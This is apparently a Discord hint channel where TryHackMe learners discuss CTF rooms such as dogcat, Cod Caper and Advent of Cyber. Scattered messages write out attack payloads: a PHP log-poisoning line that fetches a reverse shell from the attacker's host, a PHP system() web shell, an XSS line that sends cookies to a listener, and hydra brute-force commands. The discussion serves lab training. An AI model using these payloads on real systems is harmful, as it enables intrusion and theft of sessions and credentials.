#room-hints
nice, gonna spend some more time trying to figure out flag4 before i watch
guys could u help me with the year of the rabbit room
i have gained access to eli
but want access for gwendoline
?
Check our leet s3cr3t hiding place?
Man, I don't think I am meant for this
Still stuck on
The question is so simple and everything I try to type in just doesn't seem to work
What room is this?
Hint gives some good help as well as the *'s in the answer format...also I used https://byte-notes.com/number-bases/ to learn more about it. Hope it helps.
hmm I used that too, not sure what I am doing wrong
@dusky vigil - thanks for posting that walkthrough. I actually tried that ||php|| command in dogcat, I guess I got the syntax wrong. D'oh
@lofty flicker may be overthinking it. Question is just asking for the number base.
ummm i have a que about agent sudo room
task 2 que 2 what i means how would you redirect yourself to a secret website
Somebody please help me with Game Zone room, last task last question.. i need some hint.. wonder is it me doing something wrong, or the deployed machine acting crazy.. any hint is welcome
doesnt matter what payload i choose i cant connect to the machine
anyone can help me with the last task of the room 'learn linux' ?
Can you be more specific as to what you require help with as it will help others to help you.
@white salmon
have you done this room ?
hint for flag 4 dogcat please?
@stark glen check what the user you gained can run as root
@plucky adder check your hostname on the box
@thin valley by using (sudo -l) right???
@stark glen yes indeed
I will check it now @thin valley
@stark glen Good luck!
Any hint on this one? I tried a bunch of things and not getting close..
I suppose learn linux room. Sometime there are hidden users files try to catch them
Try find
ok I will try
@thin valley thanks a loooot bro i have got the flag
@stark glen you're welcome! keep up the hard work
Dogcat Nice Room
Hey guys i'm currently at "The Cod Caper", last task to crack the hash
||Well, it takes time for sure.. :D||
Hey!! Trying to exploit CVE 2019-1388 on a Windows 2016 Server.
Retro/ Day 13?
But I can't get it to open a browser or any application!!
@stuck fractal Yes
Yeah that's intentional
Look at the pins in #650425164894568455
Or the writeups for the box
@frank dirge Did you check your VPN connection? Or you can try to restart the VM
@stuck fractal doing that
@onyx bramble That doesn't matter
oh, thought it was a room
@onyx bramble It is, but the issue isn't with the VPN
Hello my "problem" its about juiceshop room task 5, i want to reset jim's password to find the answer of the secret question but im kinda lost, some ideas?
OSINT
@stuck fractal so the intended way is to launch both the browser and then launch the exploit again right?
There's another way
@stuck fractal Spamming the Ok button?
no
Amusingly
Different privesc
Hey guys
Doing WebAppSec 101
I'm trying to use a battering ram attack to bruteforce a username and password with burpsuite
The free edition of burp is throttled though, any good alternatives?
@white salmon Hydra, wfuzz
Perfect, appreciate it
@stuck fractal kernel privesc?
@stuck fractal a little help. Is there any other privesc in this box?
Or is this the only one?
@stuck fractal I overcomplicated the question I was on, got it a different way, cheers
@stuck fractal Okay. Looking around. Although almost all the write-ups are using the 2019-3688
Is there anyone who can help me with a nudge for "Jack"?
Let me try. What's your problem @white salmon ?
hi there, I would need some hint / help for https://tryhackme.com/room/thecodcaper the cod caper room, task#5 "what is my ssh password". Following the instructions the two files that I found valuable are || ssh/id_rsa and ssh/id_rsa.pub || when I "cat" those 2 , I see information but dunno what should be my next move , any suggestions ?
Look for files belonging to all users
okay
@signal perch nice!
@frank dirge I don't have much time my account expires. Which word list? Rock you ETA is 10 hours
I mean
Theoretically you could just keep extending
@white salmon
I did but then fell asleep
could anyone help me with the intropython challenge? I'm getting the error "TypeError("argument should be a bytes-like object or ASCII not 'TextIOWrapper'" when I read the file and try to decode it.
google says to convert to ASCII use the ord() function but that converts strings. could anyone provide a helpful hint please?
@noble tinsel **converts chars
what is the right method? it mentions it's encoded 5 times with base 16, 32 and 64 so I thought I was missing a step
You need to actually read the file
Have you tried working through the room first?
It covers reading files
yes i worked through the room. I see the error now ill keep at it. thanks
I wonder if that script would even work.
It wouldn't I don't think
@floral spindle yes. You need to follow the other instructions
Create the variable
Otherwise it will crash
Can anybody assist me with The Cod Caper?
Please DM me
Just ask here, or in #room-help if you want more than a hint
If I have the users private key, should I still be prompted for a password when I ssh in?
I also tried uploading my public key, but I am not having any luck
@mental osprey you should, yes. That only works under very specific circumstances
The key also needs to be properly formatted and permissioned, or it will just be ignored
Yeah I did format the private key and give it the right permissions...
If I have uploaded my public key to the server though (it isn't password protected), how come I can't SSH into the box with it?
@inland onyx Can I DM you with some more info?
If you uploaded YOUR public key to the remote user's .ssh/authorized_keys file, then that will work
@white salmon not koth
ooh ok nvm
@inland onyx Yeah I had done that... Can you maybe just assist with where to find the user's SSH password?
I think the SSH attempt isn't working for me
If this is for Cod Caper, yeah, you're better just searching for files belonging to other users
i had a similar issue there searching for files owned by ||pingu||
no pw file to be found
||find / -user pingu -type f 2>/dev/null||
Who says it's owned by that user?
||pingu||
says
Assuming my father hasn't modified since he took over my old PC, I should still have my hidden password stored somewhere,I don't recall though so you'll have to find it! find is the recommended tool here as it allows you to search for which files a user specifically owns.
Doesn't mean it's owned by them
How do you tag spoilers?
@spiral stag don't die
I am totally stuck on jack escalation to root
kk
Room Linux challenges .Task 2 no 7..give hints to find out the flag7
sure let me check my notes
@halcyon citrus you need to list ALL process running, especially system ones
by using systemctl command ?
ps command?
yup
got it! @glossy basin
good!
I did it like 3 days ago, DM me your answer @small mortar
can you help me in one more task.task2 no 10 @glossy basin
+1 let me know if it's something I need to investigate @stuck fractal
mhm 1 sec
from the same linux challenges room @glossy basin
@steady stratus might be worth checking
Mhm aye, yeah either lemme know what Nuclear's answer is or @small mortar you can dm me and I'll verify
Nope nvm
@halcyon citrus but there's a hint in the question
Answer correct, prompt missed
it's more than enough
i searched through home directory, i haven't found flag 10 file @glossy basin
@halcyon citrus check the hint
ok i will check @glossy basin
just one hint is it a txt file ? @glossy basin
do the VM's in rooms have internet access? Asking because the exploit that needs to pull nc.exe from your webserver will work if I give it the internal ip of the Kali box, and will not work when using the public IP address of the Kali box.
ok, great now I understand why it wasn't working with public IP. thanks
just one hint is it a txt file ? @glossy basin
no
it's inside the file stated in the hint
got it bro. easy one but i searched in wrong place @glossy basin
good good
May someone give me a hint in webappsec101 [task 4]? I think im making the hydra command wrong
it gives me a list of usernames, thought i needed to bruteforce or something @glossy basin
is this where i get noob help?
what do you need? :)
@white salmon no, check the pictures inside the app
and see who posted them
and you get the answer :)
ok so, i am on the burpsuit room, and i am unable to load https websites after adding the certificate (i am connected to the proxy)
it doesnt give me the error message it just doesnt load
oh i see, can i forward all ?
well, you can just intercept from a specific ip
so it doesnt intercept everything
@crimson helm
oh! i see how this works now! thanks
np ^^
@glossy basin i kinda don't understand what you say, asks me to log in if i click in a picture
my bad wrong channel
Hi, everybody! I'm looking for a hint on the Day 2 challenge of the Advent of Cyber room. I ran dirbuster using the wordlist as instructed but I haven't found anything suspicious. What am I missing? Thanks.
about bruteforcing hackpark login page, am i supposed to use the switch for ssl connections? i'm running rockyou, but without results
i've made a mistake with zap and the page appeared with the zap ssl certificate
i've received 16 good passwords... i think hydra is not working properly
does anyone have any idea how to complete flag 26 in linuxctf?
@rapid hamlet use find command
@glossy basin yes, but I've used it and no luck at all
can someone help me with hackpark bruteforcing? i think the hydra command is right, but i keep receiving a lot of false positives
ok, thanks @stuck fractal . i was filtering based on fail and not on success
i've used ||S=/admin||
i've got the ?ReturnURL= in the POST request, so i stripped out that part and added it as a success
"S=" is that how hydra works?
from hydra -U http-post-form
Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by "F=", successful condition login check must be preceded by "S=".
(ALL : ALL) NOPASSWD: /bin/mount /dev/*
i found this through sudo -l
how to use it to priv esc
That strikes me as being a little more than a hint
Also, well done getting through the RSA...
got the password but not the flag kinda different and interesting @inland onyx
Can anyone tell me which password dictionary to use for Jack ? I have tried for days rockyou
@white salmon how about, you try some of seclists
Where are you stuck @sinful plaza?
Hello new to THM started the blue room on this past Sunday 04/19/20. I got to the end of task 3 , ran the metasploit exploit it says it ran the exploit but did not start a shell. I've tried restarting the room several times in the past 2 days . Question is there something else I need to install on my computer for metasploit to actually connect with a shell?
Is your VPN on the host or VM @pure thistle?
Host? It's on my computer in my thm folder
What OS are you using?
Mint19
Could it be a problem with terminator should I just use the default terminal that comes with Mint19
Nah
Chances are that it's just EternalBlue being iffy
It's not the most stable of exploits
Keep trying
Ok thanks
@pure thistle Also, make sure you're using your TryHackMe VPN IP as your LHOST
^^
Humm ok . I thought it said I only had to set RHOST but I will check the LHOST tomorrow thanksninjajc01
Oops. NinjaJc01
@white salmon That created a file, called "noot" not "noot.txt"
Understood
@white salmon you have to add your extension to the file. (.txt)
Just in case
Are you ssh'ed into the box you deployed??
No
No to which question ?@white salmon
ssh
Did you skip the first few tasks?
No
You have to connect to the deployed box in order to capture your flags
Connecting to the machine is covered in the first few tasks of the room
Its in task 2 I believe
Did you download the access file for openvpn?
Yeah, we already had that conversation..
Copy.
Yeah, then all you have to do is deploy the box, ssh into it, and knock out each task. I'd advise not skipping any steps. Cheers! @white salmon
Okay so I need a hint on the lfi box I have the ssh key I changed permission to 600 and I'm still getting invalid format. What am I doing wrong?
@cloud perch invalid format means the format isn't quite right. Check the proper format for a key and check what you have
Hello I'm on vulnversity again, and I'm having trouble with task five question one
The hint doesn't help as it is a command that just shows me what looks to be like every file with a permission denied statement
@stuck fractal yeah I fixed it. Thanks already completed the machine
Hi, I'm in the Common Linux Privesc room, and I'm stuck on the exploiting writable /etc/password part where i need to hash the password with " openssl passwd -salt [new] [123]", is the output i got from running this command the answer to the question or i need to look somewhere else for the answer
openssl passwd -1 -salt [new] [123]
I tried the output i got from the command, its not the right answer, where else can i look for this salted password?
Ugh I'll just leave the room for now, don't think much help will be offered at midnight (I thought u hackers like the dark)
@crimson helm There's a way to filter out the permission denied statements
Oof, how's that? and do you know if that will filter out what I'm looking for in the question?
so append 2>>/dev/null to your command
note that /dev/null essentially trashes any input it's given and 2 is short for stderr (error messages)
I got it, however it doesn't really stand out from any other file, it is called systemCTL
Sorry to b a noob but I ran it, and I am unable to find any txt files in the output
Or root directory
before finding the .txt files, try to do what question 1 says about finding all suid files
(check the hint)
@tardy drum can you help me out
sure @bright steeple
Is there something im supposed to do with systemctl? Or am I just being pointed in the wrong direction
The results that come from systemctl, are they like files?
@crimson helm That's a good question for google
@tardy drum I'm in the Common Linux Privesc room, and I'm stuck on the exploiting writable /etc/password part where i need to hash the password with " openssl passwd -salt [new] [123]", is the output i got from running this command the answer to the question or i need to look somewhere else for the answer
@bright steeple I haven't done that room yet because i am not a subscriber
Found some useful material, but I still don't know how to cat a service
@crimson helm try searching up "systemctl privescs"
@tardy drum ok
Yeah I still am a little lost, I'll just get on tomorrow
Well today but later since it's 1 am
Rip
Who's done the dogcat box already I need a hint for the first flag it saids there more to view. But I'm confused
anyone has been able to root Jack "the proper" way?
anyone for a sanity check on radare the_final_exam?
i think i know what happens in ||sym.get_password|| but cant get it to work
hello
Morning @white salmon
morning @white salmon i was about to ask a question and i remembered that i haven't done any research yet
does sqlmap show you the types of injection a server is vulnerable to
SQLmap isn't really my forte however I believe it does.
I'm sure somebody with better experience of it will be able to better answer your question.
Or Google
i am trying to look and i cant seem to wrap my head around that idea
yeah i am trying to go over the manual page now
@white salmon have you done a manual sqli
hi all
you see i have found 2 but the question said bang... wrong answer
Remind me which topic and question you're on Prexe
Hi @shadow basin
finding How many types of sqli is the site vulnerable to
Which topic?
by topic you mean...
ccpentesting
@white salmon interesting
i know that sqlmap test for 5 vulnerabilities
@white salmon have you tried to formulate the SQL query
boolean based
Time-based
error-based
Union
and stacked
@violet fog didn't do it manually
is there something i am missing?
okay OWASP TG
Is there anyone who can help me with dictionary for jack
@white salmon mate, in the time you've been asking, you could easily have just tried it yourself.
Pretty sure I've already said this, but these channels are for helping people with things they don't understand.
You've been told that the dictionary you need comes preinstalled with Kali: that's your hint.
No one is going to go further than that. Go have a try for yourself -- we're not here to do it for you.
I've tried rockyou.
||The password is not in rockyou....||
@tidal sedge seclist?
Just go try random wordlists I'm sure you'll **eventually** find it.
I've spent days running rockyou. I just want to complete this box before my OSCP exam
||The password is not in rockyou.||
That helps. I'll try others. Thank you
hey i'm having a problem with running the msf exploit for steele mountain
it says exploited completed but no session is made
@white salmon I had issues with jack and brute forcing. there is a good list but sometimes it won't hit on a successful login even though the password is in that last.
lis*
list*
Just ask your question here and hope someone helps
there is a bug regarding flyspray that I don't know for what reason is not working to me at all. I've tried to restart the vm several times but no success
I am uploading the script file in order to create a new admin user and for some reasons is not creating the user
i hit a wall on the dog cat room
i can't get a reverse shell
have been trying for over 10 hours
!writeup plethora
@eager flax i had that problem to try to use something like this ||<? file_put_contents('shell.php', file_get_contents('YOURIP/SOMEREVERSESHELL')); ?>||
||set it as a custom user agent and navigate to a page where you can view some logs....||
there is a bug regarding flyspray that I don't know for what reason is not working to me at all. I've tried to restart the vm several times but no success
I am uploading the script file in order to create a new admin user and for some reasons is not creating the user
@robust hearth thx for the suggestion, i already tried that some hours ago without luck
Are you using a VM?
my tiredness and frustration have build up already for the day, i might try once more...
@stuck fractal yeah
And you're setting the LHOST in the rev shell to your VPN IP?
Subscriber kali?
the thing is i cannot upload the php-reverse-shell and when i do with curl i cannot locate it anywhere
yeah subscriber kali
the one-liners don't work
In the room Vulnversity they ask to use a wordlist which I don't have in my Kali system (using windows 10 with the subsystem linux) I downloaded dirbuster-ng on Github but none of the list are working.
Any help here ?
Avoid WSL
wsl?
Not you
@cobalt rock You can get wordlists for directory bruteforcing, but still I recommend avoiding WSL kali for a few reasons
@eager flax try hosting your shell instead of using a one liner
I mean you have RCE
Think about how your RCE works
And what kind of RCE you have
Also make sure you're using the LAN IP not the public IP for the kali VM
yeah i use the lan ip
@eager flax as @stuck fractal mentioned you have RCE. Google LFI to RCE. Should help
@stuck fractal it might be
i suck on webapps
Did you see your shell uploaded then browse /shell.php or whatever the name of the shell you uploaded is?
i just downloaded pentest monkey reverse php shell spawned a webserver using python and uploaded it, with ncat listening on a port on my win machine
i did see them on http server getting requested and transferred
and then i cannot find the file to run it
Should be just /shell.php
yeah i know
normally that would be IP/FILE
@robust hearth how did you send it over?
i only could with curl
wget doesn't work for me
||<? file_put_contents('shell.php', file_get_contents('http://IP/shell.php')); ?> set that as my header user agent in tamper on google chrome||
i tried that, i always getting an error trying to resolve
weird that did the trick for me...
i'm trying once more
Works fine... for me
I'm using the pentest monkey php shell btw but it should work with any shell....
ofc if you executed faulty php code ||in the logs|| before that one you should reboot the machine :p
i've rebooted the machine ~10 times today
Try it with pentesting monkey shell?
@stuck fractal why you don't recommend using WSL ? What are the other free options ? pendrive with kali / dualboot / virtual machine ?
WSL can be really interesting over a network
By interesting
I mean, it frequently doesn't work very well
well in this case I'm just missing the wordlists' files to use with gobuster
@stuck fractal Ok thanks !
doesn't work
i'm going to take a break and try again
i'm doing something wrong
im having trouble with that pumpkin ctf wireshark thing
last question about that audio file what should i even put in everything is returning me an error
is it like the show or something or the girl saying it? cause it really isn't working
Hi! I am having trouble with the "Steel Mountain" VM. I am at [task 2] Initial Access and for several hours I've been trying to use Metasploit to gain access with "windows/http/rejetto_hfs_exec" and the error keeps repeating: server stopped. I also tried the kali browser to see if it was my kali vm but I get the same error. Am I missing something? Because I thought the step was pretty straightforward by adding the RHOSTS = Target IP
@eager flax there are writeups for it if you really get stuck. I ||used burp to intercept the page then included something like "<?php echo system($_GET['lfi']) ?>" in one of the lines||
@remote gate I appreciate your devotion to help me solve my issues with the box man! Thank you a lot!
@stuck fractal Thank you too bud for your help
any tips for agent sudo's priv esc? I cant manage to find the CVE I've tried linenum and three exploit suggesters on the target machine
Have a look at some of my tutorial rooms @vestal igloo
It's covered on the site
@eager flax there are writeups for it if you really get stuck. I ||used burp to intercept the page then included something like "<?php echo system($_GET['lfi']) ?>" in one of the lines||
@white salmon tried that but didn't help.. I managed to get shell with some help from #room-hints
@restive light Check the RPORT
@inland onyx excuse my ping just wanted to thank you since I was stuck for a while
Np
I thought the second common private home range was ||192.186.1.1||?
@white salmon That's not the range, that's an address in the range
the way you notate the network ends in a 0
i'm stuck in the beginner room for linux, i can't find how to run a binary file, any hint ?
@white salmon Re read the tasks
it tells you how
There's literally a task with the title "running a binary" @white salmon
ok thanks
hey guys can i get some hint for agent sudo codename part?
-i've found out that it's a ubuntu machine so i tried all the ubuntu version codenames but still it doesnt work
You're not meant to end up on facebook IIRC
ok i'll give OSINT a try thanks for the hint @stuck fractal
@dense marlin Agent R?
agent r is the person announcing right?
R signed a lot of the letters yeah @dense marlin
seems like a clue for me thanks man
@stuck fractal i think i found a way to pass it without using OSINT
I think I kinda guessed it
as agent R, the codename is single character right
so i just use my burp intruder to help me out testing each char, and found a good php page man
Interesting
indeed, it's an interesting room
Currently stuck on Task 11 in the CTF Collections vol.1 room.
It gave me a .png binary file, which I converted to Hex.
I tried to put the file through CyberChef but it says invalid file format.
Just wondering if I'm missing a step in between?
Oh nvm, finally figured it out
Currently stuck on the WebAppSec 101 room, where I have to look for a log in username, the hint is to look at a name list on github. but what should i do with the name list?
i tried using the medusa brute force with the name list but it doesnt seem to work out
can someone give me a hint?
has anyone done steel mountain
did anyone else have a hardtime getting the powerup.ps1 on steelmountain to run
@bright steeple actually i didnt use that, I'll just say check pictures and see who uploaded them
hello
hi
you need a hint?
oh no :)
sweet. lol
Can anyone help me in CC steganography Final Exam, I found port 80 open, so opened it in browser but can't find any key
@long fog it's steg. Look for steg
Looking at the new strings room. Question 1.3 is ||
What is the name of a type of data that could be stored within a string?|| but not sure of the answer, it's not really clear what it's asking for although think I'm probably being stupid, I've tried ||usernames, passwords, credentials|| but think I'm missing something
think a bit more high-level @white salmon stuff like usernames for example are text
Hmm, okay, will have a think. Cheers
what would you class a pin number as? (I'm gonna add that as a hint to clarify a bit better)
(rhetorical question btw)
Sigh, got it. I suck lol
Cheers
Im stuck on shiba2 on the learn linux room
im stuck
And I need hints
Advent of Cyber - Ho-Ho-Hosint, stuck at number #2 and #4
@white salmon Create the variable, set it to $USER
nevermind finished #2 just #4
@karmic acorn If it's the question I think it is, some math
Run the binary? @white salmon
oh lol
@stuck fractal something about date
What date did Lola first start her photography? Format: dd/mm/yyyy
@karmic acorn Yea, so IDK what you've found
idk?
i know you shouldnt help me, but the php reverse shell for vulneristy doesnt seem to work for me? im using my internal ip and listening with port 1234 (netcat) any suggestions why it keeps failing and saying connection timed out?
its for uop vulnersity room, its running on my pc whilst im using kali vm on the site
Then you need to use that kali VM's IP
oh ok
Just don't say UoP vulnversity
Just say vulnversity
They're identical other than Tobi adding some files
ah wondered why it said vulnersity, thank you
@tranquil wing https://tryhackme.com/room/vulnversity for reference
doing the HackPark room and I can't seem to find the right flag for what the OS version is. Its not the OS Name or OS Version from systeminfo and its not what it says windows exploit suggester says it is. Can anyone help?
can i get a hint on the last problem for zthlinux
@wheat gorge Look for files belonging to each user
i can't understand the beginner first challenge in linux, run the binary file, i can't find it, any clue
?
learn linux room? @white salmon
yes
which task?
first challenge task 11
Have you read the note to that task?
yes
just run shiba1
i gonna try again
yes ! thanks
i'm really dumb, this challenge took me a day
not dumb, still learning
^
Just started steel mountain unable to figure out "Who is the employee of the month"
@dusk bobcat Load the page
For room Blue, how do i determine what the machine is vulnerable to?
is this another nmap command, or some other piece of information i need elsewhere?
@white salmon have you ran any nmap scripts?
yup, scanned the machine for ports
the hint is Revealed by the ShadowBrokers, exploits an issue within SMBv1
is there an nmap feature im not aware of?
oops. yeah.
sorry. noob here
--script vuln 
It's all good. Let me know if that tells you the answer. I had to boot up to check if it would
kali for now
hi all - SQLi labs. I've got this URL: http://<ip>/sqli-labs/Less-9/ .....how am I supposed to begin the SQLi? In general chat, someone said I should look at doing it via the URL, but, am I supposed to use dirbuster first? Just need a little push to get me going
Actually, I think i've got it (sorta). ||?id=1||
anyone here done madness?
nevermind... that's so dumb ffs
@nocturne vault do you need help?
just thought the solution to the part i was stuck was pretty dumb
@nocturne vault i suppose you were stuck where i got stuck
probably ssh pw
yep
hello all
https://tryhackme.com/room/introtopython the challenge on this is driving me up the wall. When looping through decoding I 16 and 64 bit are fine when encoding, but b32 claims to have non-32 bit chars even when encoded
I am trying to do the challenge of jack of all trades but firefox is telling me that the page is restricted. I tried to go on about:config and add the network.security.ports.banned.override
but is not working even after that
any idea on how I should resolve this?
Mine is sorted
Has anybody completed the Learn Linux room, I'm stumped on Task 21
@mental lichen I have
let me have a look
thanks, it's to do with environment variables
TryHackMe Walkthrough Link: https://tryhackme.com/room/zthlinux Learn Linux is a great introductory room from Paradox. As the name suggests, it gives a nice foundation for Linux skills. This is a walkthrough room, so I'm not going to go into a huge amount of detail about the c...
here's a write up on it
you have to use export to change the user to test1234
I really don't want to look at a write up yet, surely it should be simple. I just want to check with someone if my theory was correct
ok, you have the right idea then for sure
I tried to set the variable rather than using export
But I get a segmentation fault when I run the binary
yeh, I got the same
I am trying to do the challenge of jack of all trades but firefox is telling me that the page is restricted. I tried to go on about:config and add the network.security.ports.banned.override
but is not working even after that
any idea on how I should resolve this?
not sure, bud @echo thunder
@mental lichen
I am an absolute chump, lol
lol I got stuck on it for ages too man
thank you so much
i cant seem to find the ssh password in the room thecodcaper
i have the reverse shell and im on the www-data user
i used find / -user pingu to find all files owned by pingu, but i cant find where the ssh password is
i saw an id_rsa and id_rsa.pub in /home/pingu/.ssh and tried to use that but it refused the id_rsa private key i got from the server and tried to use
am i doing something wrong?
Who says it's owned by pingu? @white salmon
oh
what should i be doing then?

and i tried to put the id_rsa.pub in /home/pingu/.ssh/authorized_keys too
You have it
hm?
u need to change permission of that key to be able to login without password
oh
hm ok
but now how do i make pingu the owner of authorised_keys, chown says the operation isn't permitted
can I get any hints for blueprint?
cant use any of the links cause url changes to localhost
@white salmon u need to change permission of id_rsa to work with ssh command
I might be wrong, but I think the id_rsa is a rabbit hole here
@stuck fractal not really sometime you need John to help
No, here.
I remember pars saying that whole thing was a rabbit hole but OK
@stuck fractal let me re-check
There are two people telling you the opposite
@vestal igloo Maybe you can change where localhost points
i was worried i could ruin something or i was digging my own rabbit hole somehow thanks for affirmation
@vestal igloo I might be wrong
i guess i will have to find out plus its something good to learn so no harm
bless your soul
Dark was having trouble with the bitcoin address on stream yesterday
Are you using the suggested windows VM? @echo thunder
Dark was
Dark couldn't find it either you say? @stuck fractal
I'll have to look at his vod when I finish my shift in a couple of hours
yikes okay uhh
sorry pal - I'll have to investigate when I can tonight
@steady stratus found the wallet
needed to restart
the windows vm
did anyone complete the symfonos6 challenge?
hey all - on the CTF-ToolsRus box, it says to use a Nikto / Nmap scan and give the name and version of the software for task #6. I did this but it didn't give me the correct answer. Is there a blooper or something i'm doing wrong?
@hasty gust Make sure you go for the right port
I can't say which as it's an answer
@stuck fractal i'm pretty sure I did , but i'll re-try. I went for a port with increasing numbers (without giving it away hopefully)
DM me your answer then @hasty gust
In steelmountain how do I replace the legitimate binary?
What did you try?
@white salmon ||I hear powershell is a good tool.|| But of course there might be other good tools. I guess that's my hint. Sleep well
@white salmon Metasploit has an upload feature if you have a meterpreter. Otherwise, you can host it on a web server and grab it
So I am doing the volatility room right now and did all the volatility parts but I can't upload the file to hybrid analysis because its too big
and the other one doesn't give anything
so uhm what could I do?
there are no writeups so I can't get the answer anywhere
mmm
might have to be the dlls instead
but one problem then still
--pid is not an option
it doesnt exist
so I just guessed 12 because it was that before
It probably does, but only in conjunction with a different option
yo guys
I need some help
with the room "thefindcommand"
in task #3 the 7th question
"Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)"
So it would be: find /usr/bin -type f -user root -perm ??
it doesn't specify whose perms it is for
SUID isn't a perm for a user @rapid hamlet
SUID is a special perm that applies to everyone
I know
but it doesn't specify who should "at least have the SUID permission"
/u=s?
/g=s?
I've tried those, it returns incorrect answer
That's not how SUID works
SUID doesn't belong to a user
SUID allows the person (anyone) running the binary to run it as the owner
It's a permission
so how should it be represented in symbolic?
Google it
In steel mountain, after restarting the program, ||I need to migrate the process don't I?||
@white salmon You need to listen for a shell
You need to get the new, more privileged shell
I mean, I did all of that but it still doesn't work
I must be doing something wrong but huh
MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM====== Can somebody tell me how I can decode this? I'm stuck with this string
Which encode ends with =? @shell sun
there's a few
I don't know but it looks familiar
Well, investigate then @shell sun
I've been working on this code for about an hour
there's a few
@stuck fractal I can recall only 3, and I'm not sure with the least
few can mean 2
But I know at least 2
And I can tell you which one it is, but that's more than a hint
Do you know a good website, where all the encodings are listed?
There is a tool inside kali that could help you identify the encoding
Hi, anyone can give me a hint for flag value cc pentesting room (sqlmap?)
@white salmon Yes, use sqlmap
Thx
Thx
@white salmon https://www.binarytides.com/sqlmap-hacking-tutorial/
Sqlmap is the most popular tool for carrying out automated sql injections against vulnerable systems. In this tutorial we are going to learn to use it.
Oaw great man, cheers for this
Anyone able to help with App Locker?
I have run invoke kerberoast, but I'm getting token length and separator unmatched errors with the ticket.
@patent token I had that, with some really weird line break issues
Right. They pull far right.
If you remove linebreaks, it might work
But when trying to modify them I'm really not having any luck
So try going in just one really long line?
yep
Yeah I had the same issue
I'll give it a whirl. Thank you.
That did the trick. Thank you again. I really appreciate it.
@patent token Glad it worked
Wouldn't have a hint on the encrypted password by chance? I've checked base64, base32, hash-identifier, etc.
||I see the enabled true and plaintext false.||
@patent token I have a hint but it's more of a help
Help == hint for me.
After 7 hours still not getting the value of the flag, cc pentesting room / sqlmap challenge, any hints pls?


so im currently doing https://tryhackme.com/room/zthlinux im on Task 11 which is wanting me to run a binary of a file called noot.txt but when i do ./noot.txt it says permission denied
can anyone help me?
Right, can you list the files in that directory and send the output here?
So you've made the noot.txt file, now you need to run the shiba1 binary to get the flag.
For all the binary tasks, the name of the binary is in the task title
okay
Anyone know how to replace the process (with metasploit) in steel mountain
I tried a lot of things and it still didn't work
Any hints would be nice
anyone active
What's up yo
@naive geyser how would you replace an archive in windows?
I'm trying it out now thx
I mean, dont know if you understand what I said
?
so @naive geyser did you figure it out? :)
Hello everyone, I'm doing the learn Linux room and I am on the last task where you have to find a key. it says it is in root/root.txt, but if i try to go there it says permission denied :( Can anyone help?
@odd belfry yes, you need to gain root privileges
by privilege escalation
(check the write up if you are not sure)
Okay I will look. Thank you very much.
what is a write up?
!writeup zthlinux
@odd belfry ^
woow thank you man
anytime
@white salmon No
Hi everyone! i guess this is the room i need
LFI basics, i can't read the file and i tried with /../*x but still nothing
The challenge says you can read the file, so i'm lost i guess
I did not do the challenge but sometimes you can right-click to view the source of the page. If it's a .log file it should be just text so no reason a browser should not show its content.
usually when having an e.g. include($_GET["page"]) for the url you posted.
@grand pivot so i assume it would normally be like ?page=home or even ?page=about.php or w/e extension
lets try again so
@grand pivot yea
Hello everyone
i get it! Thank you!
can I have a hint on how to find the answer to task 12 question 9?
pee pee poo poo
@dire karma Official warning. One more, you're banned.
@echo thunder i think you need to specify the room
@grand pivot hackback2019
forgot to mention it
sorry
did you complete the room?
can I have a hint on how to find the answer to task 12 question 9 for HackBack 2019 challenge?
hi, im here again xD
i need to do uname -r on the lfi basics room
but the blankspace is not a good friend (actually just uname doesnt in either), so i tried with ls and everything is ok. So i guess the structure of the request is fine
and tried with url encode but nothing
and with "+"
could anyone give me a push on inoculation?
@grand pivot how to write spaces in urls?
@grand pivot uname-r isn't a valid command
im trying now just with "uname" without arguments
anyway, i tried with encoding the url but doesnt work, that's why i give a spet backwards
step*
well, i rebooted the vm and cleaned everything, and used encoding and it works
i get it! Thanks for everyone!
in hackpark, where can I see the theme I uploaded? it's task 2
Can someone help me with day 18 of advent of cyber. I'm trying to get the admin cookie but it just keeps giving me my own session cookie instead
I'm doing this: </p><script>console.log(document.cookie)</script><p>test
@frank ether try to make a persistent xss that sends the cookie to a listening server
https://tryhackme.com/room/hydra Can someone help me with the syntax for the webform? I had the SSH one in a minute and can't get the webform one right whatever I try.
This is what I've tried: ||hydra -l molly -P 10.10.72.240 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V||
Error message: ||[ERROR] Unknown service: /:username=^USER^&password=^PASS^:F=incorrect||
@still elm I tried using window.location<my ip> + document.cookie but that didn't work either
it messed up the whole web page and it started sending the cookie from my ip for some reason
did you set up a listening service?
@frank ether i know what you mean. first time i did that i had to redeploy the machine 2 times
ya I set it up on port 80
and I waited like 10 minutes
nothing
but it sent my cookie right away
try to stop and restart the service
i can't try atm, but i'll check later how i solved that... i need to refresh my memory
sweet thank you
Hi @stuck fractal , thanks for the link! I found that site earlier and tried some stuff but I just don't see it. I think I'm doing something wrong in the first bit after http-post-form.
Hmmm. Ok. I have the some result with "/login"
Also, you're using the IP address as your password list
Oh haha that would not work.
Running now. Thanks @stuck fractal !
Can't believe I missed that.
@frank ether did you put onload on the script when you send it back to your listener?
onload
how would I do that
Dm me
I'm really new to XSS stuff
i've tried without and it didn't work, but maybe i've misspelled something the first time
@stuck fractal do you know if there's something wrong with this:</p><script> window.location = 'http://<local-machine-ip>/page?param=' + document.cookie </script><p>
because that's what @inland onyx did and it worked for him
but ya it's just not working for me
What type of server are you running to listen?
Reset it every time you get a cookie, don't touch the webpage after you set the payload
And by local machine IP, what IP are you using?
my vpn ip
Ok
10...
if you want discord not to format stuff, use `around it` and it'll put it in an inline code block
ya i just realized
10.*.**.***
ok i did killall nc and then restarted
so now i'll just wait for the admin to log on hopefully
yea it's been 7 minutes and I haven't gotten any cookie yet
i'll keep waiting but idk if it's working
the web page is just perpetually loading
and it says Waiting for <my ip>
I said don't touch the page
i didn't
i'm gonna retry
I think I may know why it didn't work
I might have to open the port after I inject
...you need a listener running yes
no but I was opening the port before
Doesn't matter
i'm thinking that if i open it right after then it might work
But if you get your own cookie, you need to restart
I feel like i'm the only one who has any problem with these advent of cyber challenges
That's mostly because everyone had the problems back in december
oh true
i got the same exact problem @frank ether and i solved it in the way that i've explained. i've tried and it worked again. i tried a third time, and now, i get no response (neither my own cookie)
i just got it actually
I think the trick was to open the port after injecting
thanks for the help
@sand glen Log in as that user
but I don't have the email
The point of the challenge is to break the authentication @sand glen
